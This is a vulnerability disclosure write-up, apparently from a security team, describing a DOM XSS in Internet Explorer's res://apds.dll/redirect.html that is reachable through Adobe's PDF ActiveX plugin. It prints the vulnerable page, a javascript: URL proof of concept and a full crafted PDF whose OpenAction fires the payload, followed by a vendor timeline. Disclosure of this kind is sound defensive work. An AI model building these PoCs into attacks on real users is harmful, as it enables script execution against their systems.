From http:// domain to res:// domain xss by using IE Adobe’s PDF ActiveX plugin
Author: Heige(a.k.a Superhei) of KnownSec 404 Team
Date: 03/19/2019
1. res://apds.dll/redirect.html
dom xss
https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&desc=5 had reported an xss vulnerability in res://apds.dll/redirect.html
. And this vulnerability has not been fixed until now.
This vulnerability is a typical dom xss vulnerability form the res://apds.dll/redirect.html
code:
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script type="text/javascript">
var targetParamRegex = /[\?\&]target=([^\&\#]+)/i;
var targetResults = targetParamRegex.exec(window.location.search);
if (targetResults) {
window.location.replace(decodeURIComponent(targetResults[1]));
}
</script>
</head>
<body>
</body>
</html>
PoC:
res://apds.dll/redirect.html?target=javascript:alert(1)
2. from http://
domain to res://
domain
Usually accessing res://
resources via http://
domain is not allowed. The Javascript function xfa.host.gotoURL()
in Adobe PDF can access multiple URLs include http(s)://
file://
etc. Of course, in general, there will be security tips when you open the PDF files.
But when we use xfa.host.gotoURL()
to access res://
or http(s)://
by IE Adobe's PDF ActiveX plugin :
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
There are no security alerts. and the xss payload “alert(1)” is executed.
PoC:
http://xxxxxxx/r.pdf
r.pdf code:
%PDF-1.4
1 0 obj
<<>>
%endobj2 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config><template>
<subform name="a">
<pageSet/>
</subform>
</template>
</xdp:xdp>
endstream
endobjtrailer
<<
/Root
<<
/Pages <<>>
/AcroForm
<<
/XFA 2 0 R
>>
/OpenAction
<<
/S/JavaScript
/JS(
xfa.host.gotoURL("res://apds.dll/redirect.html?target=javascript:alert(1);//");
)
>>
>>
>>
3. fixed?
Due to some security domain isolation of IE, the harm of res://
domain xss is limited. But I think Microsoft should actively fix the res://apds.dll/redirect.html
xss vulnerability, and Adobe should disable or give corresponding security warnings when URL redirect,The world can be more beautiful and harmonious!
4. Timeline
- October 04, 2018 Report it to Adobe PSIRT and MSRC
- October 05, 2018 Adobe tracking number PSIRT-8981.
- October 09, 2018 MSRC Case 47932 CRM:0461065793
- October 18, 2018 Adobe PSIRT has been investigating and still
- November 21, 2018 MSRC have completed our investigation and determined that the case doesn’t meet the bar for immediate servicing in a security update.
- March 19, 2019 Public